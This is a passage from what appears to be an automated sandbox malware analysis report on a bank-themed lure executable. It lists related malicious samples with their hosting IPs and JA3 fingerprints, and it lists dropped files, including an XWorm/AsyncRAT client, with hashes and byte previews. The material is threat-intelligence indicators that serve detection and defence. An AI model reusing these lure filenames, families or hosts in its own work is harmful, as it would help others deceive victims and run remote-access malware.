	AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	193.123.91.33
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	F7Xu8bRnXT.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
UNREAL-SERVERSUS	QLTa31hZsN.exe	Get hash	malicious	RedLine, XWorm	Browse	212.162.149.53
	mCtN05kxh6.exe	Get hash	malicious	Remcos	Browse	162.251.122.86
	Bank Fund Transfer-589237.scr.exe	Get hash	malicious	Remcos	Browse	212.162.149.226
	Payment Transfer Request Form.bat.exe	Get hash	malicious	Remcos	Browse	212.162.149.226
	Pago_BBVA.pdf.bat.exe	Get hash	malicious	Remcos	Browse	162.251.122.76
	PO - HTS - 0893.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.35
	PO - HTS - 0893.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.35
	PO 331385674200010.exe	Get hash	malicious	FormBook, GuLoader	Browse	212.162.149.35
	Vodka.exe	Get hash	malicious	Remcos, GuLoader	Browse	212.162.149.35
	O0rhQM49FL.exe	Get hash	malicious	GuLoader	Browse	212.162.151.158
CLOUDFLARENETUS	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.6
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	INVITATION TO BID as on 25 NOV 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.13.205
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	file.exe	Get hash	malicious	Unknown	Browse	104.21.7.169
OVHFR	Fatura931Pendente956.pdf761.msi	Get hash	malicious	Unknown	Browse	91.134.82.79
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	51.38.171.30
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	192.99.154.40
	http://www.kalenderpedia.de	Get hash	malicious	Unknown	Browse	217.182.178.234
	apep.m68k.elf	Get hash	malicious	Unknown	Browse	192.99.178.29
	file.exe	Get hash	malicious	Xmrig	Browse	51.195.43.17
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	46.105.79.108
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.38.112.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	F7Xu8bRnXT.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.205
	Fatura931Pendente956.pdf761.msi	Get hash	malicious	Unknown	Browse	104.26.12.205
	EPTMAcgvNZ.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	104.26.12.205
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.12.205
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.12.205
	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	WOOYANG VENUS PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	104.26.12.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.26.12.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\build.exe	QLTa31hZsN.exe	Get hash	malicious	RedLine, XWorm	Browse
C:\Users\user\AppData\Local\Temp\XClient.exe	QLTa31hZsN.exe	Get hash	malicious	RedLine, XWorm	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YkxAHNcqEmoeLS.e_9eeb4b354541f12768ae3acca2321103de9a447_c301604a_e73110a1-db0f-4795-a1cb-34777456ce2d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9604971439776012
Encrypted:	false
SSDEEP:	192:QykBYTodQRf0BU/qa6MDzuiFbZ24IO8v:BkBYTa9BU/qaHzuiFbY4IO8v
MD5:	07833E57D96FE0FBD8897D6C13488288
SHA1:	8C28BB4175D7B26D1A7425164D2D58128D8D8DF7
SHA-256:	0A4DE9E3B1076D6A1A8F2135A86E203DBEA1B453E16957978CE00235BB1F969F
SHA-512:	27F8F4A7ECD63FA7B60826A7C37E1344BB64778A8A9FC4C59CFDFE0B0F77B792478FBB0AE16402E372C22365CDA95B63DB1250AB11352840374E9A899E500B4D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.8.1.6.7.5.7.7.6.2.5.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.8.1.6.7.7.3.2.3.1.3.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.3.1.1.0.a.1.-.d.b.0.f.-.4.7.9.5.-.a.1.c.b.-.3.4.7.7.7.4.5.6.c.e.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.b.2.e.1.c.e.-.7.1.6.1.-.4.9.d.0.-.9.a.9.2.-.1.a.5.3.0.d.8.c.5.8.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.k.x.A.H.N.c.q.E.m.o.e.L.S...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.T.C.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.d.c.-.0.0.0.1.-.0.0.1.4.-.d.9.3.4.-.b.a.5.d.d.9.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.3.9.a.0.3.0.e.d.5.1.e.4.9.6.7.4.5.c.5.0.6.5.9.8.a.e.9.5.c.f.0.0.0.0.0.0.0.0.!.0.0.0.0.4.d.2.b.1.4.6.9.1.9.8.0.5.2.4.2.a.1.6.9.9.1.3.9.d.2.9.3.7.b.a.e.4.f.d.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER68E7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Nov 26 08:01:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	179018
Entropy (8bit):	4.135733301814977
Encrypted:	false
SSDEEP:	1536:6sc1ypN4uE2aOESVXJhKL6LTgkgY+AC8TsQCCDNtTseBuBojRYG:6sr4uEqEybKGLTgpuF5LomY
MD5:	79A1DBF592631091B0B8F0FA2D355FCE
SHA1:	97247A9FD9FF348BDAC7D259A521C77079A0D6EA
SHA-256:	1CB222EFA40C6DC4C19154667350B6709D945AF59D7A3A6C15E6A3CB449610F9
SHA-512:	5C46B737E17563ECA4C11A6C43E52DC9D42287EDEAD37E0BA48B5341A2DF2B7D77B74FC8D1B8DB01CD67CA69B2F9C44719E40A17C1A971339D8DFA9D474EAAFC
Malicious:	false
Preview:	MDMP..a..... .......L.Eg........................(...........<...............&<..........`.......8...........T...........8(..........................................................................................................eJ..............GenuineIntel............T...........K.Eg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D5C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.7016338219471843
Encrypted:	false
SSDEEP:	192:R6l7wVeJx/6p6YA+6+F3gmfZcVrpr189bUQsfz8m:R6lXJJ6p6Y56+F3gmfuEUjfN
MD5:	2205C13BEB6F4B99A4CEE76FB5AB1674
SHA1:	D266D709BF4AD7DC613DFE4F3D62A0FBF9091BB6
SHA-256:	E3BD35369667D6D545DB667794A4FA2CB28E44C9575BEF99CB3BB220AEF9BD7D
SHA-512:	291B658685B02B07706DC66D5BD4FF1EC89E56AD90E0E09BFC013AEA05A104657DD9663D1CE76FDC47BEB06E87D00ED880FEB8CE038E648B4648E44AB7F708BB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DBB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4765
Entropy (8bit):	4.499988934909809
Encrypted:	false
SSDEEP:	48:cvIwWl8zsRuJg77aI9VaWpW8VYfYm8M4J8I0IHdFBRP+q8vqIHen1IPKIP1d:uIjfaI7bb7VnJZxpRPKz+CPTP1d
MD5:	F184AD8916F8D7D328B44955468C40AB
SHA1:	C00A490840C1A95887F38812D88E1652E8BD9B55
SHA-256:	745471BA75A045CD6924DE5D4AFC604231666FCBE5C275121A8247E0599BEE56
SHA-512:	6970F6D181F845C6CBED987AEAF41A80EA888764EAEE5A64988724FC63FA84E9FB966553377F0BF011F3E6E4A2C3736FEF4BC936742AE40C4259D2EBD051A8FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604743" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YkxAHNcqEmoeLS.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.log

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\build.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\build.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulnXh:NllUn
MD5:	D41EF5921A7078E8FF15F42558D09790
SHA1:	8CE5404C1B56604803F8E2452FE7123D0A900740
SHA-256:	384333BD5E58BB4AC081E4C99B2DC7FEBC7995B0FC46120888D45630AD23E1A2
SHA-512:	D04605CA18C94A3AE493313855F859B7821F45E2340FA8E851072FC371BA6230680211581493920D52B382EFFC3C0F8B6B00FB122A8B3C06164B5C1417B088FD
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\XClient.exe

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.615792070447318
Encrypted:	false
SSDEEP:	768:cSF2nEi97d/xhGrPivCNIxcmwlM72FD93eO+h8JrBD:cSwEYxZM0C9lMiFD93eO+WJBD
MD5:	1C5CF825E29B63A62C3C8B1589D51A1E
SHA1:	EA4F1DCEEEEA35B6BD17F4040511BBD0341246A8
SHA-256:	D868406F1FDC6A5C15A70F03F6279FB8A3FE190EA5A4911BF6839FC483C753B0
SHA-512:	C780AFF70B930EA221FFD96081C02116F76D2C7B20590FFF6AB04038E2AEF50AD57EB8F28A67C4DFDB6A00E3FE393E1238D448C3F346585242EE18D180203FD2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 68%, Browse
Joe Sandbox View:	Filename: QLTa31hZsN.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-%g............................~.... ........@.. ....................................@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H........[...[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ama4o1q.feq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_do2x0bxo.n45.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foarqcar.ytx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

